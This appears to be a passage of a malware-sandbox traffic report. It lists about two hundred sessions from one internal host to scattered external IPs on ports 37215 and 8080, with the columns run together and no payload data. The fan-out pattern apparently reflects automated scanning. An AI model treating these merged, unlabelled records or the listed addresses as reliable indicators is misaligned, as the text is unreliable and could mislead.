                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36305192.168.2.234895041.225.64.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36306192.168.2.2338982197.244.155.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36307192.168.2.2348684157.59.186.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36308192.168.2.2360092157.212.159.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36309192.168.2.2356734157.151.179.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36310192.168.2.2341852157.27.43.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36311192.168.2.2351816205.190.191.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36312192.168.2.2359146157.169.25.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36313192.168.2.235305241.231.152.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36314192.168.2.235416241.8.239.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36315192.168.2.2352698197.31.103.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36316192.168.2.234087241.140.66.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36317192.168.2.235758841.150.68.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36318192.168.2.2343226157.219.46.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36319192.168.2.235945641.134.207.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36320192.168.2.2338536157.122.245.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36321192.168.2.2334622157.105.177.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36322192.168.2.2337836197.183.185.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36323192.168.2.2337460156.200.148.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36324192.168.2.2350162157.164.3.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36325192.168.2.2341946141.44.44.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36326192.168.2.2344316197.120.151.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36327192.168.2.2347408157.147.79.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36328192.168.2.2355742157.144.222.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36329192.168.2.2346472157.240.174.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36330192.168.2.2351042157.249.107.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36331192.168.2.2345960157.160.49.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36332192.168.2.234935268.35.88.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36333192.168.2.2339540157.105.37.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36334192.168.2.2338426115.238.225.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36335192.168.2.233711088.149.153.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36336192.168.2.234893423.122.135.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36337192.168.2.234535065.34.187.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36338192.168.2.233773683.55.104.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36339192.168.2.2339474157.181.141.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36340192.168.2.2358000134.10.41.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36341192.168.2.2347852197.216.32.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36342192.168.2.2340290197.106.41.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36343192.168.2.234324641.141.60.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36344192.168.2.235766241.241.190.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36345192.168.2.2353198210.61.231.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36346192.168.2.234976241.64.45.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36347192.168.2.234023267.95.86.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36348192.168.2.233336620.167.171.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36349192.168.2.2358606157.199.107.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36350192.168.2.2343564197.45.22.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36351192.168.2.235562241.201.101.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36352192.168.2.2338080197.220.129.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36353192.168.2.2350070197.111.224.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36354192.168.2.2334696129.221.95.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36355192.168.2.2356390157.157.148.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36356192.168.2.235488660.31.247.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36357192.168.2.2348630134.154.15.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36358192.168.2.2352982155.210.37.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36359192.168.2.2346082157.60.156.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36360192.168.2.2347996100.33.117.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36361192.168.2.2345182157.255.25.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36362192.168.2.234342041.126.224.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36363192.168.2.234433641.19.168.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36364192.168.2.2341656157.17.119.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36365192.168.2.2357356197.174.131.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36366192.168.2.233597441.200.20.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36367192.168.2.2336792157.196.21.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36368192.168.2.2356572157.96.66.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36369192.168.2.2338136197.252.138.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36370192.168.2.235703041.125.245.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36371192.168.2.2334530157.179.60.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36372192.168.2.2358044197.35.47.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36373192.168.2.2339714157.51.213.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36374192.168.2.2337104157.103.141.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36375192.168.2.2343914157.240.35.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36376192.168.2.2352368197.244.252.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36377192.168.2.2355266156.244.55.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36378192.168.2.2341506114.188.172.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36379192.168.2.2345494157.31.150.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36380192.168.2.233681671.97.74.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36381192.168.2.235935241.127.243.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36382192.168.2.2348300197.210.143.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36383192.168.2.2351248150.178.185.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36384192.168.2.2340052197.196.13.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36385192.168.2.234399045.3.253.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36386192.168.2.233785441.5.27.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36387192.168.2.2354674197.210.20.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36388192.168.2.234640441.156.242.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36389192.168.2.2334810197.216.67.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36390192.168.2.2359838149.110.230.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36391192.168.2.2358784219.103.122.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36392192.168.2.2358948157.61.73.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36393192.168.2.2342446220.76.158.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36394192.168.2.235198841.86.153.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36395192.168.2.2333028157.221.239.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36396192.168.2.2349750157.113.24.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36397192.168.2.2352034157.105.239.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36398192.168.2.2341296197.188.153.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36399192.168.2.2359296157.53.73.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36400192.168.2.2344256157.2.36.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36401192.168.2.2354814197.51.76.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36402192.168.2.2340460197.64.51.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36403192.168.2.2333452197.145.122.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36404192.168.2.2332836197.78.188.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36405192.168.2.2343784197.208.142.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36406192.168.2.233697023.39.16.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36407192.168.2.2345942169.6.252.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36408192.168.2.234043041.127.205.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36409192.168.2.234765041.73.37.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36410192.168.2.233443041.103.65.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36411192.168.2.233601441.84.166.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36412192.168.2.2351586197.123.71.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36413192.168.2.2351740157.250.105.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36414192.168.2.235275241.71.99.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36415192.168.2.2346136125.23.230.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36416192.168.2.234831641.75.250.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36417192.168.2.235299841.130.23.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36418192.168.2.234955441.200.217.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36419192.168.2.233501897.139.172.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36420192.168.2.2348452196.191.208.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36421192.168.2.2334364106.13.10.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36422192.168.2.236037820.221.178.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36423192.168.2.2335730189.163.20.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36424192.168.2.2358038169.108.90.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36425192.168.2.2357394164.9.122.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36426192.168.2.2357472131.174.191.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36427192.168.2.23332268.61.12.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36428192.168.2.2355118201.94.86.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36429192.168.2.2349462119.249.225.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36430192.168.2.2349590173.7.244.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36431192.168.2.235734863.101.87.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36432192.168.2.233761861.113.239.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36433192.168.2.2359562193.65.96.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36434192.168.2.2342458108.14.83.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36435192.168.2.235650019.153.122.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36436192.168.2.234136690.197.231.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36437192.168.2.2354150125.151.203.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36438192.168.2.2333794182.254.210.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36439192.168.2.2360870221.72.195.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36440192.168.2.2349382152.211.20.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36441192.168.2.234264624.131.200.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36442192.168.2.2347200141.193.244.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36443192.168.2.234365450.254.128.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36444192.168.2.2338494111.117.185.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36445192.168.2.2339380211.107.69.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36446192.168.2.2354302168.243.169.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36447192.168.2.2337394144.1.111.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36448192.168.2.2358794181.140.82.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36449192.168.2.2352304207.95.97.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36450192.168.2.235592893.185.21.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36451192.168.2.233966048.200.0.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36452192.168.2.2342804166.176.232.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36453192.168.2.235613024.159.168.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36454192.168.2.2343192135.72.129.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36455192.168.2.2342032199.41.79.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36456192.168.2.2357198167.214.111.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36457192.168.2.234187258.149.126.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36458192.168.2.2348600146.151.0.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36459192.168.2.2346506206.105.143.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36460192.168.2.2355878163.141.252.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36461192.168.2.2346752152.81.67.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36462192.168.2.2357758203.129.105.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36463192.168.2.2351080163.174.17.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36464192.168.2.2347124105.133.140.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36465192.168.2.2344072149.180.17.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36466192.168.2.2353302217.98.180.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36467192.168.2.2346836156.60.202.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36468192.168.2.2358092180.164.76.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36469192.168.2.235557237.92.177.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36470192.168.2.233590679.61.29.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36471192.168.2.2356748197.213.9.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36472192.168.2.2341762180.157.202.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36473192.168.2.2333556210.36.127.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36474192.168.2.233528048.32.122.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36475192.168.2.2345076118.94.159.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36476192.168.2.2336114134.132.83.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36477192.168.2.2344916153.236.255.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36478192.168.2.235359480.26.146.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36479192.168.2.2357990125.141.24.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36480192.168.2.235692246.157.17.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36481192.168.2.234070646.140.161.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36482192.168.2.2356102124.125.210.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36483192.168.2.2343042171.234.71.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36484192.168.2.2346842168.93.217.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36485192.168.2.2337924103.93.134.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36486192.168.2.2337654182.166.42.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36487192.168.2.2346454206.134.224.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36488192.168.2.233671246.236.254.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36489192.168.2.235788068.56.182.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36490192.168.2.2347966213.85.17.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36491192.168.2.233905234.80.39.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36492192.168.2.2342018101.100.7.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36493192.168.2.2356012216.0.161.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36494192.168.2.2343176191.98.218.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36495192.168.2.2353586212.66.2.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36496192.168.2.2357840162.136.192.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36497192.168.2.233686861.136.182.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36498192.168.2.2339192191.110.249.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36499192.168.2.235761641.193.168.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36500192.168.2.2355204143.203.76.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36501192.168.2.2350048167.126.236.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36502192.168.2.234663263.134.136.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36503192.168.2.2359564119.247.76.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36504192.168.2.2347890130.193.99.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36505192.168.2.235563699.27.11.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36506192.168.2.2343468150.47.57.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36507192.168.2.233342062.63.104.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36508192.168.2.2334638170.196.204.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36509192.168.2.2343772159.158.223.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36510192.168.2.234691477.234.242.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36511192.168.2.2347990141.179.205.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36512192.168.2.235589441.121.50.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36513192.168.2.2356372159.88.3.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
